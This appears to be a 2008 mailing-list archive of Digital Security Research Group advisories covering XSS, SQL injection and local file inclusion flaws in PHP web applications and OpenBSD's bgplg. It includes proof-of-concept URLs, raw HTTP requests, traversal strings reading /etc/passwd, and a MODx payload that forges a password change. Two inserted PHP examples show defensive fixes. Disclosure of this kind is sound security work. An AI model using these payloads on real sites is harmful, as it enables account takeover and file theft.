POST parameters comment_closed, project_is_active.

Example:

project_is_active = <img src=javascript:alert('DSecRG XSS')>


1.5 Vulnerabilities found in script index.php?do=details.

POST parameters closedby_version, edit, edit_start_time, 
find_user, item_status, operating_system, percent_complete, 
product_category, project_id, reportedver, task_priority, 
task_severity, task_type.

Example:

project_id = <script>alert('DSecRG XSS')</script>
item_status = <img src=javascript:alert('DSecRG XSS')>


-


2. Stored XSS vulnerability found in script index.php?do=details on the task details page. 

POST parameter item_summary.

Example:

item_summary = <script>alert('DSecRG XSS')</script>

-


3. Login Error Messages Credential Enumeration

When a login attempt with bad credentials fails, the application returns
different error messages for an invalid username and for an invalid password.

An attacker can use brute force to establish valid usernames before
proceeding to attempt discovery of the associated password.



Fix Information
***

Flyspray was altered to fix this flaw on 24.02.2008. Updated version (0.9.9.5) 
can be downloaded here:
http://www.flyspray.org/download/


Vendor advisory
***

http://flyspray.org/fsa:3


About
*

Digital Security is a leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems, with vulnerability reports, advisories and
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)






-- 

 Digital Security Research Group   mailto:[EMAIL PROTECTED]



[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

2008-02-19 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-016


Application:            Jinzora Media Jukebox
Versions Affected:      2.7.5
Vendor URL:             http://www.jinzora.com/
Bugs:                   Multiple XSS Injections
Exploits:               YES
Reported:               04.02.2008
Second report:          12.02.2008
Vendor response:        NONE
Date of Public Advisory: 19.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS



Details
***

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL 
string.


1.1 Linked XSS vulnerabilities found in index.php.

GET parameters frontend, set_frontend, jz_path, theme, set_theme.

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC=javascript:alert('DSecRG XSS')>


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters frontend, theme, language.

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC=javascript:alert('DSecRG XSS')>


1.3 Linked XSS vulnerability found in slim.php. GET parameter jz_path.

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC=javascript:alert('DSecRG XSS')>


1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters frontend, theme, jz_path.

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC=javascript:alert('DSecRG XSS')>


1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/;<script>alert('DSecRG XSS')</script>

-


2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter 
name siteNewsData 

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>


2.2 Vulnerability found in script popup.php?ptype=playlistedit in post
parameter name query

Example:

query = <script>alert('DSecRG XSS')</script>








[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

2008-02-19 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-015


Application:            Dokeos E-Learning System
Versions Affected:      1.8.4
Vendor URL:             http://dokeos.com
Bugs:                   Multiple SQL Injections, Multiple Blind SQL Injections,
                        Multiple XSS, etc.
Exploits:               YES
Reported:               25.01.2008
Vendor response:        28.01.2008
Patch released:         12.02.2008
Date of Public Advisory: 19.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

Dokeos E-Learning System has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind SQL Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
***


1. Multiple SQL Injections

1.1  Attacker can inject SQL code in module /whoisonline.php, vulnerable
parameter id.
Attacker must have valid user credentials.
 

Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+dsec=dsecrg+union+select+user(),version()/*


1.2  Attacker can inject SQL code in module main/mySpace/index.php, vulnerable
parameter tracking_list_coaches_column

Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin&tracking_list_coaches_column=0';

1.3  Attacker can inject SQL code in module
/dokeos/main/create_course/add_course.php, POST parameter tutor_name


Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&tutor_name='



-


2.  Multiple Blind SQL Injections

2.1 Vulnerability found in script index.php in header parameter Referer


Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.2 Vulnerability found in script /main/admin/class_list.php in header
parameter X-Forwarded-For



-




3. Stored XSS vulnerability found in /main/auth/inscription.php; attacker can
inject XSS in POST parameter username.


-

4. Multiple linked XSS


4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php;
attacker can inject XSS in parameter courseCode.


Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=;<script>alert('DSecRG XSS')</script>



4.2 Linked XSS vulnerability found in main/admin/course_category.php; attacker
can inject XSS in parameter category.

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=<script>alert('DSecRG XSS')</script> HTTP/1.0



4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php;
attacker can inject XSS in parameter cmessage.


Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=%22%27<img/src=javascript:alert('DSecRG XSS')>

-


5. Image XSS vulnerability in page main/auth/profile.php: attacker can upload
an avatar picture containing XSS code.


Example:

More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

-

Fix Information
***

Vendor fixed this flaw on 12.02.2008. The patch for version 1.8.4 can be
downloaded here:

http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download






[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS

2008-02-14 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-011 | FIX INFORMATION


Application:            Astrosoft HelpDesk
Versions Affected:      1.95.228
Vendor URL:             http://astrosoft.ru/
Bugs:                   Multiple XSS Injections
Exploits:               YES
Reported:               29.01.2008
Date of Public Advisory: 04.02.2008
Vendor response:        05.02.2008
Updated Report:         14.02.2008
Solution:               HelpDesk was altered to fix this flaw on 13.02.2008.
                        Updated version - 1.95.228
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)




[DSECRG-08-014] Multiple LFI in PowerNews (Newsscript) 2.5.6

2008-02-08 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-014


Application:            PowerNews (Newsscript)
Versions Affected:      2.5.6
Vendor URL:             http://www.powerscripts.org/
Bug:                    Multiple Local File Include
Exploits:               YES
Reported:               01.02.2008
Vendor Response:        none
Solution:               none
Date of Public Advisory: 08.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

PowerNews (Newsscript) has multiple Local File Include vulnerabilities.


1. Local File Include vulnerabilities found in scripts: 

pnadmin/categories.inc.php
pnadmin/news.inc.php
pnadmin/other.inc.php
pnadmin/permissions.inc.php
pnadmin/templates.inc.php
pnadmin/users.inc.php

Unauthenticated users can access these scripts directly.

Code

#

  if ($_GET["subpage"]) {
    // page and subpage come straight from the query string; only file_exists()
    // stands between them and include()
    if (file_exists($_GET["page"]."_".$_GET["subpage"].".inc.php")) {
      include($_GET["page"]."_".$_GET["subpage"].".inc.php");
    } else {
      ?><center><?PHP echo L_ALL_SUBPAGENOTFOUND; ?></center><?PHP
    }
  } else {

#

Example: 

http://[server]/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00


2. Local File Include vulnerability found in script pnadmin/index.php in admin 
area.

Administrator can include local files.

Code

#

if ($pnloggedin != "YES") {

  include("login.inc.php");

} else {

  // the page name is taken from the query string and included after a bare file_exists()
  if (!$_GET["page"]) { $_GET["page"] = "main"; }
  if (file_exists($_GET["page"].".inc.php")) {
    include($_GET["page"].".inc.php"); } else {

#

Example:

http://[server]/[installdir]/pnadmin/index.php?page=../../../../../../../../../../../../../etc/passwd%00







[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities

2008-02-07 Thread Digital Security Research Group [DSecRG]


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-013


Application:            MODx CMS
Versions Affected:      0.9.6.1, 0.9.6.1p1
Vendor URL:             http://modxcms.com/
Bugs:                   XSS, SiXSS, stored XSS, Change User Password XSRF Vulnerability.
Exploits:               YES
Reported:               11.01.2008
Vendor response:        11.01.2008
Updated Report:         29.01.2008
Vendor response:        none
Solution:               none
Date of Public Advisory: 07.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

MODx system has multiple security vulnerabilities:

1. Linked XSS
2. Linked SiXSS
3. XSS in POST
4. Stored XSS in POST
5. Change User Password XSRF Vulnerability



Details
***


1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL 
string.


1.1 Linked XSS vulnerability found in manager/index.php. GET parameter search

Search string is available in pages:

http://[server]/[installdir]/manager/index.php?a=75

http://[server]/[installdir]/manager/index.php?a=84

http://[server]/[installdir]/manager/index.php?a=99

http://[server]/[installdir]/manager/index.php?a=106

http://[server]/[installdir]/manager/index.php?a=114


Example:

http://[server]/[installdir]/manager/index.php?a=75&search=;<IMG SRC=javascript:alert('DSecRG XSS')>

http://[server]/[installdir]/manager/index.php?a=84&search=;<IMG SRC=javascript:alert('DSecRG XSS')>


1.2 Linked XSS vulnerability found in index.php. GET parameter highlight

Example:

http://[server]/[installdir]/index.php?searched=modx&highlight=;<IMG SRC=javascript:alert('DSecRG XSS')>

--


2. Multiple linked SiXSS vulnerabilities found. Attacker can inject XSS code in 
SQL Error.


2.1 Vulnerability found in script manager/index.php. GET parameter a

Example:

http://[server]/[installdir]/manager/index.php?a='<img src=javascript:alert('DSecRG XSS')>


2.2 Vulnerability found in script index.php. GET parameter id

Example:

http://[server]/[installdir]/index.php?id='<img src=javascript:alert('DSecRG XSS')>

---


3. XSS in POST, attacker can inject XSS in POST parameter


3.1 Vulnerability found in script index-ajax.php. 

POST parameters docgrp and moreResultsPage.

Example:

moreResultsPage = <IMG SRC=javascript:alert('DSecRG XSS')>


3.2 Vulnerability found in script index.php. 

POST parameters email, name and parent.

Example:

name =  style=background:url(javascript:alert('DSecRG XSS'))

---


4. Vulnerability found in script manager/index.php?a=10 

POST parameters messagesubject and messagebody.

Attacker can compose a message with script code in the subject and message body.

---


5. Change User Password XSRF Vulnerability

The previous password is not required to set a new password.

Using the XSS vulnerabilities, an attacker can include the following code to
change the user's password:

___

IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',http://[server]/[installdir]/manager/index.php?a=34,false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send(pass1=123456%26pass2=123456);`
___






[DSECRG-08-012] Multiple LFI in Azucar CMS 1.3

2008-02-05 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-012


Application:            Azucar CMS
Versions Affected:      1.3
Vendor URL:             http://azucarcms.sourceforge.net/en_home.htm
Bug:                    Multiple Local File Include
Exploits:               YES
Reported:               30.01.2008
Vendor Response:        NONE
Date of Public Advisory: 05.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

Azucar CMS has multiple Local File Include vulnerabilities.


1. Local File Include vulnerabilities found in scripts index.php and 
index_sitios.php

Code

#

// ereg() only checks that the value *starts* with src or vistas;
// "../" segments after that prefix are not rejected
if (isset($_GET["_VIEW"]) && ereg("^src|^vistas", $_GET["_VIEW"]))
    include($_GET["_VIEW"]);
else
    header("Location: html/sitio/");

#

Example: 

http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../../../../../../../../../../../../etc/passwd


2. Local File Include vulnerability found in script 
src/sistema/vistas/template/tpl_inicio.php

Code

#

// no validation at all: the request value is included as given
$vista = (isset($_GET["_VIEW"])) ? $_GET["_VIEW"] : PATH_PROYECTO .
    'vistas/index.php';

include($vista);

#

Example:

http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php?_VIEW=../../../../../../../../../../../../../etc/passwd


3. Local File Include vulnerability found in script html/sitio/index.php

Code

#

if (isset($_GET["_VIEW"])) {
    if (!file_exists($_GET["_VIEW"])) {
        $vista_array = explode('/', $_GET["_VIEW"]);
        $vista = $vista_array[0] . '/es_ES/' . $vista_array[2];
    } else
        $vista = $_GET["_VIEW"];
}

// same prefix-only ereg() check as in index.php
$vista = (isset($_GET["_VIEW"]) && ereg("^src|^vistas", $_GET["_VIEW"])) ? $vista :
    PATH_PROYECTO . 'vistas/es_ES/index.php';
include($vista);

#

Example:

http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../../../../../../../../../../../etc/passwd






[DSECRG-08-010] VHD Web Pack 2.0 Local File Include

2008-02-04 Thread Digital Security Research Group




Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-010


Application:            VHD Web Pack 2.0
Versions Affected:      VHD Web Pack 2.0
Vendor URL:             http://www.divideconcept.net/index.php?page=vhdwebpack/index.php
Bugs:                   Local File Include
Exploits:               YES
Reported:               28.01.2008
Vendor response:        NONE
Date of Public Advisory: 04.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***


VHD Web Pack 2.0 has a Local File Include security vulnerability.



Details
***


Local File Include

Attacker can inject PHP code and execute OS commands with web server user
privileges.

Vulnerable script: /vhdwebpack/index.php, vulnerable parameter: page

Example:


http://[server]/vhdwebpack/index.php?page=/../../../../../../../../boot.ini













[DSECRG-08-009] xoops 2.0.18 Local File Include

2008-02-04 Thread Digital Security Research Group
Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-009


Application:            XOOPS
Versions Affected:      XOOPS 2.0.18
Vendor URL:             http://www.xoops.org/
Bugs:                   Local File Include, URL Redirecting & phishing
Exploits:               YES
Reported:               28.01.2008
Vendor response:        28.01.2008
Date of Public Advisory: 04.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)





Description
***

XOOPS system has multiple security vulnerabilities:

1. Local File Include
2. URL redirection phishing


Details
***


1. Local File Include

Attacker can inject PHP code and execute OS commands with web server user
privileges.

Vulnerable script: htdocs/install/index.php, vulnerable POST parameter: lang

Vulnerable code:

$language = 'english';
if ( !empty($_POST['lang']) ) {
    $language = $_POST['lang'];
.
.
.
.
// $language is never validated before being spliced into the include path
if ( file_exists("./language/".$language."/install.php") ) {
    include_once "./language/".$language."/install.php";
Example:


POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; 
PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php

lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next
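The XOOPS lang include just shown, the PowerNews pnadmin/*.inc.php includes and the Azucar _VIEW includes earlier in this thread share one root cause: a request value is concatenated into include() and the only guard is file_exists(), an ereg() prefix match, or nothing. What follows is an added example, not code from any of those projects, of a resolver that never lets the client supply a path; the base directory, the allowlist, the suffix and the temporary files in the self-check are constructed for the demonstration.

```php
<?php
// Added example, not XOOPS/PowerNews/Azucar code: a hardened replacement for
// include($base . $_GET['page'] . '.inc.php') and include("./language/$lang/install.php").
// $baseDir, $allowed, $suffix and the temporary files below are constructed for the demo.

/**
 * Map a client-supplied name to a file under $baseDir, or return null.
 * Three independent layers, any one of which blocks the advisories' payloads:
 *   1. an allowlist of known names, so the client never supplies a path at all;
 *   2. a strict character class that excludes "/", "." and NUL, so "../" and
 *      the "boot.ini%00.html" truncation trick never reach the filesystem;
 *   3. realpath() containment, which keeps the check sound even if the
 *      allowlist is later generated from a directory listing.
 */
function resolve_include(string $baseDir, string $name, array $allowed, string $suffix): ?string
{
    if (!in_array($name, $allowed, true)) {
        return null;                          // not a known page/language name
    }
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $name)) {
        return null;                          // traversal characters or NUL
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $name . $suffix);
    if ($base === false || $file === false || !is_file($file)) {
        return null;                          // base or target does not exist
    }
    // realpath() has removed ".." and symlinks, so a prefix test is now meaningful
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                          // resolved outside the base directory
    }
    return $file;
}

// ---- self-check on a throwaway directory (constructed input, runs offline) ----
$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($dir . '/language/english', 0700, true);
file_put_contents($dir . '/language/english/install.php', "<?php return 'en';\n");
file_put_contents($dir . '/secret.txt', "must stay private\n");

$allowed = ['english', 'german'];             // german is allowed but not installed
$cases = [
    'english'                                   => true,   // legitimate request
    'german'                                    => false,  // allowed name, no file
    "/../../../../../../../../boot.ini\0.html"  => false,  // XOOPS PoC, URL-decoded
    '../../../../../../../../../etc/passwd'     => false,  // PowerNews PoC, URL-decoded
    '../secret'                                 => false,  // escape to a sibling file
];
foreach ($cases as $input => $expectHit) {
    $resolved = resolve_include($dir . '/language', $input, $allowed, '/install.php');
    printf("%-48s -> %s\n", json_encode($input, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'reject' : 'include');
    if (($resolved !== null) !== $expectHit) {
        throw new RuntimeException("unexpected result for " . json_encode($input));
    }
}
// The one accepted name includes exactly the file the allowlist points at.
$ok = resolve_include($dir . '/language', 'english', $allowed, '/install.php');
if ((include $ok) !== 'en') {
    throw new RuntimeException('included the wrong file');
}

// tidy up
unlink($dir . '/language/english/install.php');
unlink($dir . '/secret.txt');
rmdir($dir . '/language/english');
rmdir($dir . '/language');
rmdir($dir);
```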










-


2. URL Redirection phishing

Vulnerability found in script htdocs/user.php?xoops_redirect, in POST parameter
xoops_redirect.


Example:

http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com 



Fix Information
***


Vendor fixed this flaw in svn on 28.10.2007.

http://xoops.svn.sourceforge.net/viewvc/xoops?view=rev&revision=1282

Tracker:
http://sourceforge.net/tracker/index.php?func=detail&atid=430840&aid=1881236&group_id=41586








[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS

2008-02-04 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-011


Application:            Astrosoft HelpDesk
Versions Affected:
Vendor URL:             http://astrosoft.ru/
Bugs:                   Multiple XSS Injections
Exploits:               YES
Reported:               29.01.2008
Vendor response:        NONE
Date of Public Advisory: 04.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

Astrosoft HelpDesk system has multiple security vulnerabilities:

1. Linked XSS
2. Linked SiXSS



Details
***

1. Linked XSS vulnerability found in
operator/article/article_search_results.asp; attacker can inject XSS in GET
parameter txtSearch.

Example:

http://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch=;</form><IMG SRC=javascript:alert('DSecRG XSS')>




2. SiXSS in URL

Vulnerability found in script operator/article/article_attachment.asp; attacker
can inject XSS code into the SQL error message.

GET parameter Attach_Id

Example:

http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id=;<script>alert('DSecRG XSS')</script>






[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities

2008-02-04 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-008


Application:            Txp CMS
Versions Affected:      4.0.5
Vendor URL:             http://www.textpattern.com
Bugs:                   DOS, multiple XSS, etc.
Exploits:               YES
Reported:               11.01.2008
Vendor response:        14.01.2008
Patch Released:         03.02.2008
Date of Public Advisory: 04.02.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

Textpattern system has multiple security vulnerabilities:

1. Parameter Value Overflow
2. Linked XSS
3. XSS in POST
4. Stored XSS
5. Insecure password changing algorithm


Details
***

1. Parameter Value Overflow

Vulnerability found in script index.php in the comments section. POST parameter
message.

The application does not limit the length of the parameter value. This can be
used to perform a DoS attack.


Example:

message = [A]x1




2. Linked XSS vulnerability found in /textpattern/setup/index.php; attacker can
inject XSS in the URL string.


Example:

http://[server]/[installdir]/textpattern/setup/index.php/;<script>alert('DSecRG XSS')</script>




3. XSS in POST

Vulnerability found in script index.php in comments section. Post parameter 
name.


Example:

name = <img src=javascript:alert('DSecRG XSS')>

name = <script>alert('DSecRG XSS')</script>




4. Stored XSS

Vulnerability found in script textpattern/index.php?event=article in post 
parameter Body. 


Example:

Body = <IMG SRC=javascript:alert(&quot;DSecRG_XSS&quot;)>




5. Insecure password changing algorithm

The previous password is not required to set a new password.

If an attacker gains access to the admin session by using an XSS vulnerability,
he can change the admin password without knowing the old password.

It would be more secure to ask for the old password when changing the password
or the primary email.
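Item 5 here and item 5 of the MODx advisory earlier in this thread describe the same gap: a password change that needs neither the current password nor an unforgeable request token. The following is an added example (not MODx or Textpattern code) of a handler that requires both; the session array, the user record and the requests it is fed are constructed stand-ins for the real stores and forms.

```php
<?php
// Added example, not MODx or Textpattern code: a password-change handler that
// requires the current password and a per-session anti-CSRF token.
// $session and $user are constructed stand-ins for the real session and user store.

function change_password(array &$session, array &$user, array $post): string
{
    // 1. Anti-CSRF token, compared in constant time; a missing token fails closed.
    //    This stops a request forged from a third-party page.
    $token = $post['csrf_token'] ?? '';
    if ($token === '' || !hash_equals($session['csrf_token'], $token)) {
        return 'rejected: bad or missing CSRF token';
    }
    // 2. Re-authenticate. Script injected via XSS can read the page (and so the
    //    token), but it cannot produce the victim's current password.
    if (!password_verify($post['old_password'] ?? '', $user['hash'])) {
        return 'rejected: current password incorrect';
    }
    // 3. Only now accept the new value, and require the confirmation to match.
    $new = $post['pass1'] ?? '';
    if ($new === '' || $new !== ($post['pass2'] ?? '')) {
        return 'rejected: new passwords empty or do not match';
    }
    $user['hash'] = password_hash($new, PASSWORD_DEFAULT);
    // Rotate the token so a captured one is single-use.
    $session['csrf_token'] = bin2hex(random_bytes(16));
    return 'ok';
}

// ---- constructed demo ---------------------------------------------------------
$session = ['csrf_token' => bin2hex(random_bytes(16))];
$user    = ['name' => 'admin', 'hash' => password_hash('old-secret', PASSWORD_DEFAULT)];

// Shape of the forged request in the MODx payload: pass1 and pass2 only.
$r1 = change_password($session, $user, ['pass1' => '123456', 'pass2' => '123456']);
// Same request carrying a stolen token but no current password.
$r2 = change_password($session, $user, ['csrf_token' => $session['csrf_token'],
    'pass1' => '123456', 'pass2' => '123456']);
// Legitimate submission from the user's own form.
$r3 = change_password($session, $user, ['csrf_token' => $session['csrf_token'],
    'old_password' => 'old-secret', 'pass1' => 'n3w-secret', 'pass2' => 'n3w-secret']);

foreach ([$r1, $r2, $r3] as $i => $r) {
    printf("request %d: %s\n", $i + 1, $r);
}
if ($r1 === 'ok' || $r2 === 'ok' || $r3 !== 'ok') {
    throw new RuntimeException('handler accepted a forged request or refused a valid one');
}
if (password_verify('123456', $user['hash']) || !password_verify('n3w-secret', $user['hash'])) {
    throw new RuntimeException('stored hash does not reflect the legitimate change');
}
```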


Fix Information
***

Textpattern was altered to fix this flaw on 03.02.2008. Updated version (4.0.6) 
can be downloaded here:
http://textpattern.com/download






[DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.

2008-01-31 Thread Digital Security Research Group


[#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory


Application:            OpenBSD BGPD daemon
Versions Affected:      OpenBSD 4.1
Vendor URL:             http://openbsd.org
Bugs:                   XSS
Exploits:               YES
Reported:               10.10.2007
Vendor response:        10.10.2007
Date of Public Advisory: 31.01.2008
Authors:                Alexandr Polyakov, Anton Karpov
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

OpenBSD BGPD daemon Web Interface has an XSS vulnerability.


History


http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html




Details
***


Linked XSS vulnerability found in script /cgi-bin/bgplg; attacker can inject XSS
in parameter cmd.

Example:


http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>


Fix Information
***

Vendor fixed this flaw in svn on 10.10.2007. The updated version, OpenBSD 4.2,
which was released Nov 1, 2007, can be downloaded here:

http://openbsd.org






Re: [DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.

2008-01-31 Thread Digital Security Research Group
version 4.2 is NOT affected, please alter it in advisory
http://secunia.com/advisories/28726/  and others.


Vendor fixed this flaw in cvs on 10.10.2007.
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/bgplg/bgplg.c

Updated version OpenBSD 4.2 which was released Nov 1, 2007 is NOT
vulnerable.





 [#DSECRG-08-007] Digital Security Research Group [DSecRG] Advisory


 Application:OpenBSD BGPD daemon
 Versions Affected:  OpenBSD 4.1 
 Vendor URL: http://openbsd.org
 Bugs:   XSS
 Exploits:   YES
 Reported:   10.10.2007
 Vendor response:10.10.2007
 Date of Public Advisory:31.01.2008
 Authors:Alexandr Polyakov, Anton Karpov
 Digital Security Research Group
 [DSecRG] (research [at] dsec [dot] ru)



 Description
 ***

 OpenBSD BGPD daemon Web Interface has XSS  vulnerability


 History
 

 http://www.mail-archive.com/[EMAIL PROTECTED]/msg49057.html




 Details
 ***


 Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject 
 XSS in parameter cmd

 Example:


 http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>


 Fix Information
 ***

 Vendor fix this flaw in cvs on 10.10.2007. Updated
 version OpenBSD 4.2 which was released Nov 1, 2007. can be downloaded here:

 http://openbsd.org






Remote File Disclosure in phpCMS 1.2.2

2008-01-29 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-005


Application:            phpCMS
Versions Affected:      1.2.2
Vendor URL:             http://www.phpcms.de
Bug:                    Remote File Disclosure, Get admin password
Exploits:               YES
Reported:               10.01.2008
Vendor response:        12.01.2008
Date of Public Advisory: 29.01.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG]
                        (research [at] dsec [dot] ru)



Description
***

phpCMS has a remote File Disclosure vulnerability in
/parser/include/class.cache_phpcms.php


Details
***

Attacker can read any file in the web directory.

The file parser/parser.php includes class.cache_phpcms.php:

---

// Load the i18n Handler
if (isset ($_GET ['file']) && isset($DEFAULTS->I18N) && 'on' ==
$DEFAULTS->I18N) {
    include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');
    $I18N = new i18n;
}
$PHPCMS->check_secure_stealth();
// the requested file is resolved and echoed by class.cache_phpcms.php
include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');
exit;

---


In file class.cache_phpcms.php, function GetFile() parses the URL and returns
the full file name or a default value.
The function checks the file extension but doesn't check for null byte injection.

To read a file, the attacker must append a valid extension after a null byte to
the file name, e.g. %00.gif or similar.

---

// filequery exists, but filename is empty? - set the defaultvalue for filename
// stristr() only asks whether the extension occurs *somewhere* in the string
if(!stristr($temp, $DEFAULTS->PAGE_EXTENSION) AND
   !stristr($temp, '.gif') AND
   !stristr($temp, '.png') AND
   !stristr($temp, '.jpg') AND
   !stristr($temp, '.js') AND
   !stristr($temp, '.css') AND
   !stristr($temp, '.htm') AND
   !stristr($temp, '.html'))

{   if(substr($temp, -1) != '/') {
        $temp = trim($temp).'/'.$DEFAULTS->PAGE_DEFAULTNAME;
        $temp.= $DEFAULTS->PAGE_EXTENSION;
    } else {
        $temp = trim($temp).$DEFAULTS->PAGE_DEFAULTNAME;
        $temp.= $DEFAULTS->PAGE_EXTENSION;
    }
}

---


In file class.cache_phpcms.php, function CheckFile() takes the file name and,
if the file exists, reads it and prints its contents.

---
$PfadUndDatei = $this->GetFile();

$this->name = basename($PfadUndDatei);
$this->path = dirname($PfadUndDatei);
...

// there's no contentfile with this name - errorpage or errormessage
if(!file_exists($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name)) {
    $errorname = basename($DEFAULTS->ERROR_PAGE_404);
